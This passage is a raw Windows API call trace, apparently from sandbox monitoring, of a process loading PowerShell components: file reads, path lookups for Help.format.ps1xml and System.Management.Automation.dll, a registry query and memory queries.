lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.383] GetLastError () returned 0x0 [0054.383] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.384] GetLastError () returned 0x0 [0054.384] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.384] GetLastError () returned 0x0 [0054.384] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.384] GetLastError () returned 0x0 [0054.384] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.384] GetLastError () returned 0x0 [0054.384] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.384] GetLastError () returned 0x0 [0054.384] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.384] GetLastError () returned 0x0 [0054.385] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.385] GetLastError () returned 0x0 [0054.385] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.385] GetLastError () returned 0x0 [0054.385] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.385] GetLastError () returned 0x0 [0054.385] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.385] GetLastError () returned 0x0 [0054.385] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.385] GetLastError () returned 0x0 [0054.386] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.386] GetLastError () returned 0x0 [0054.386] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.386] GetLastError () returned 0x0 [0054.386] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.386] GetLastError () returned 0x0 [0054.386] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.386] GetLastError () returned 0x0 [0054.386] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.386] GetLastError () returned 0x0 [0054.387] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.387] GetLastError () returned 0x0 [0054.387] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.387] GetLastError () returned 0x0 [0054.387] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.387] GetLastError () returned 0x0 [0054.387] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.387] GetLastError () returned 0x0 [0054.387] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0xf37, lpOverlapped=0x0) returned 1 [0054.387] GetLastError () returned 0x0 [0054.388] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa02c3, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa02c3*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.388] GetLastError () returned 0x0 [0054.388] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.388] GetLastError () returned 0x0 [0054.388] CloseHandle (hObject=0x31c) returned 1 [0054.388] GetLastError () returned 0x0 [0054.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0054.388] GetLastError () returned 0x0 [0054.388] SetErrorMode (uMode=0x1) returned 0x1 [0054.388] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fc1be8 | out: lpFileInformation=0x2fc1be8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0054.388] GetLastError () returned 0x0 [0054.388] SetErrorMode (uMode=0x1) returned 0x1 [0054.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0054.388] GetLastError () returned 0x0 [0054.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.389] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.389] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.389] RegCloseKey (hKey=0x31c) returned 0x0 [0054.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0054.389] GetLastError () returned 0x0 [0054.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0054.389] GetLastError () returned 0x0 [0054.401] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x18345f1c, Data2=0xe744, Data3=0x4313, Data4=([0]=0xbb, [1]=0x41, [2]=0x66, [3]=0xdb, [4]=0x1d, [5]=0x8f, [6]=0x57, [7]=0x2f))) returned 0x0 [0054.401] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x5d605643, Data2=0x2def, Data3=0x41c1, Data4=([0]=0x8e, [1]=0x89, [2]=0x0, [3]=0xe7, [4]=0x52, [5]=0x4b, [6]=0x3e, [7]=0x7c))) returned 0x0 [0054.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.401] GetLastError () returned 0x0 [0054.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.401] GetLastError () returned 0x0 [0054.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.401] GetLastError () returned 0x0 [0054.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.401] GetLastError () returned 0x0 [0054.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.431] GetLastError () returned 0x0 [0054.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.431] GetLastError () returned 0x0 [0054.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.431] GetLastError () returned 0x0 [0054.431] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x9a2c621e, Data2=0x2ea8, Data3=0x4a2f, Data4=([0]=0xbb, [1]=0x97, [2]=0xbc, [3]=0xdc, [4]=0xd9, [5]=0x2, [6]=0xf7, [7]=0x2e))) returned 0x0 [0054.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.431] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce058, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.432] GetLastError () returned 0x0 [0054.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.433] GetLastError () returned 0x0 [0054.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.433] GetLastError () returned 0x0 [0054.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.433] GetLastError () returned 0x0 [0054.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.433] GetLastError () returned 0x0 [0054.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.433] GetLastError () returned 0x0 [0054.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.433] GetLastError () returned 0x0 [0054.434] VirtualQuery (in: lpAddress=0x2cd294, lpBuffer=0x2ce294, dwLength=0x1c | out: lpBuffer=0x2ce294*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.434] VirtualQuery (in: lpAddress=0x2cd2d0, lpBuffer=0x2ce2d0, dwLength=0x1c | out: lpBuffer=0x2ce2d0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.435] GetLastError () returned 0x0 [0054.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.435] GetLastError () returned 0x0 [0054.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.435] GetLastError () returned 0x0 [0054.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.435] GetLastError () returned 0x0 [0054.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.435] GetLastError () returned 0x0 [0054.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.435] GetLastError () returned 0x0 [0054.435] VirtualQuery (in: lpAddress=0x2cd600, lpBuffer=0x2ce600, dwLength=0x1c | out: lpBuffer=0x2ce600*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.436] GetLastError () returned 0x0 [0054.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.436] GetLastError () returned 0x0 [0054.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.436] GetLastError () returned 0x0 [0054.436] VirtualQuery (in: lpAddress=0x2cd600, lpBuffer=0x2ce600, dwLength=0x1c | out: lpBuffer=0x2ce600*(BaseAddress=0x2cd000, AllocationBase=0x290000, 